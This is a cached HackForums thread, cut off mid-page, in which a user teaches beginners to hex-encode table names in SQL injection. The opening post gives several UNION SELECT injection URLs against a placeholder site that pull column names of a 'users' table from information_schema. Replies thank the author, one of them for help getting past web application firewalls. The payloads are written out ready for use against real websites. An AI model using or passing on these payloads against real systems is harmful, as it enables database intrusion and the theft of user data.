<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=2686704" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=2686704" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=2686704</a>. It is a snapshot of the page as it appeared on 17 Mar 2014 11:00:55 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=2686704" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:aY_hiPCFvJUJ:www.hackforums.net/showthread.php%3Ftid%3D2686704&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>SQLi - tip for newbies - converting to hex - Page 1</title> <meta name="description" content="SQL Injection Attacks-SQLi - tip for newbies - converting to hex"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=2686704"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-17-2014, 04:00 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">SQLi - tip for newbies - converting to hex</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (3):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=2686704" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/rating.js"></script><div id="success_rating_2686704" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_2686704"><li style="width: 0%" class="current_rating" id="current_rating_2686704">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=2686704&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2686704&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2686704&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2686704&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2686704&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_2686704" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_2686704_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=2686704" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2686704&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_2686704");
// -->
</script><div><strong>SQLi - tip for newbies - converting to hex</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid24570525" id="pid24570525"></a><table class="tborder" style="border-top-width: 0; " id="post_24570525" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-17-2012, 04:33 AM <span id="edited_by_24570525"><span class="smalltext">(This post was last modified: 07-17-2012 11:10 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24570525#pid24570525">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img title="" src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/avatar_949543.png" alt="undefined" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,150<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">213</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24570525">Hi,<br><br>there are plenty of SQLi tutorials here on this forum. There we find commands like:<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.somesite.com/event.php?id=-13
 union select 1,group_concat(column_name),3 FROM 
information_schema.columns WHERE table_name="users"</code></div></div><br>Sometimes this command doesn't work. Because of that we must change table name to hex like<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.somesite.com/event.php?id=-13
 union select 1,group_concat(column_name),3 FROM 
information_schema.columns WHERE table_name=0x7573657273</code></div></div><br>where:<br><span style="font-weight: bold;"><span style="color: #00BFFF;">0x</span></span> is sign for value will be in hex<br><span style="font-weight: bold;"><span style="color: #00BFFF;">7573657273</span></span> is hex representation of our table name <span style="color: #00BFFF;">users</span><br><br>So we need some ascii to hex converters like <a href="http://www.asciitohex.com/" target="_blank">http://www.asciitohex.com/</a> for such conversion.<br><br>But there is also another option to use function <span style="color: #32CD32;">concat</span>.<br><br>This function returns the string that results from concatenating the arguments. If we input three arguments in function like<br><br><span style="color: #32CD32;">concat('My', 'S', 'QL')</span> function will return <span style="color: #32CD32;">MySQL</span><br><br>This function can help us convert our value to hex without using web pages with converters.<br><br><span style="color: #32CD32;">concat('0x', hex('users'))</span> will return <span style="color: #32CD32;">0x7573657273</span><br><br>So our command<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.somesite.com/event.php?id=-13
 union select 1,group_concat(column_name),3 FROM 
information_schema.columns WHERE table_name=0x7573657273</code></div></div><br>can be changed to<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.somesite.com/event.php?id=-13
 union select 1,group_concat(column_name),3 FROM 
information_schema.columns WHERE table_name=concat('0x', hex('users'))</code></div></div><br>And name of the table (<span style="color: #00BFFF;">users</span>) is easier to understand as <span style="color: #00BFFF;">0x7573657273</span> in our SQL command.</div><div class="post_meta" id="post_meta_24570525"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24570525" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid24574212" id="pid24574212"></a><table class="tborder" style="margin-top: 5px; " id="post_24574212" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-17-2012, 07:40 AM <span id="edited_by_24574212"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24574212#pid24574212">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1384530"><span style="color:#383838">pimaS</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 15<br>Joined: Jul 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1384530"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24574212">Thanks so much for the little tutorial, very useful for me</div><div class="post_meta" id="post_meta_24574212"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1384530" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24574212" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid24577252" id="pid24577252"></a><table class="tborder" style="margin-top: 5px; " id="post_24577252" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-17-2012, 09:55 AM <span id="edited_by_24577252"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24577252#pid24577252">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1310549"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/bam.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1310549"><span class="group2">BlackRoas</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 26<br>Posts: 551<br>Joined: May 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1310549"><strong class="reputation_positive">32</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24577252">nice work bro keep up 0o0 0o0o 0o0o0 0o0o0 0o0oo0</div><div class="post_meta" id="post_meta_24577252"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1310549" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24577252" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid24608696" id="pid24608696"></a><table class="tborder" style="margin-top: 5px; " id="post_24608696" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-18-2012, 12:25 PM <span id="edited_by_24608696"><span class="smalltext">(This post was last modified: 07-18-2012 12:26 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1163773">Dadas1337</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24608696#pid24608696">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1163773"><span class="group2">Dadas1337</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"> <br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 4<br>Posts: 67<br>Joined: Feb 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1163773"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24608696">yeah, some time ago i couldn't get past some WAFs or whatever it was, because i didn't knew about this :D<br><br>nice tip</div><div class="post_meta" id="post_meta_24608696"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1163773" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24608696" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid24640315" id="pid24640315"></a><table class="tborder" style="margin-top: 5px; " id="post_24640315" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-19-2012, 03:51 PM <span id="edited_by_24640315"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24640315#pid24640315">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,150<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">213</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24640315"><blockquote><cite><span>(07-18-2012 12:25 PM)</span>Dadas1337 Wrote: <a href="http://www.hackforums.net/showthread.php?pid=24608696#pid24608696" class="quick_jump">►</a></cite>yeah, some time ago i couldn't get past some WAFs or whatever it was, because i didn't knew about this :D<br><br>nice tip</blockquote><br>We are all learning. There are some experts here and I really enjoy reading their tutorials.</div><div class="post_meta" id="post_meta_24640315"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24640315" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid24705103" id="pid24705103"></a><table class="tborder" style="margin-top: 5px; " id="post_24705103" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-21-2012, 05:30 PM <span id="edited_by_24705103"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24705103#pid24705103">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1390679"><span class="group2">siban</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 17<br>Joined: Jul 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1390679"><strong class="reputation_negative">-3</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24705103">good job<br>if i want use programe search thes</div><div class="post_meta" id="post_meta_24705103"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1390679" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24705103" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid24705523" id="pid24705523"></a><table class="tborder" style="margin-top: 5px; " id="post_24705523" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-21-2012, 05:44 PM <span id="edited_by_24705523"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24705523#pid24705523">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=493159"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/k61XP.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=493159"><span class="group29">Prominent</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">White hat<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 199<br>Posts: 3,014<br>Joined: Sep 2010<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=493159"><strong class="reputation_positive">574</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/supportfeather.png" alt="Support Feather" title="Support Feather"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24705523">Don't forget that you can also do hex encoding via hackbar.</div><div class="post_meta" id="post_meta_24705523"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=493159" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24705523" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid24705725" id="pid24705725"></a><table class="tborder" style="margin-top: 5px; " id="post_24705725" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-21-2012, 05:50 PM <span id="edited_by_24705725"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24705725#pid24705725">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a 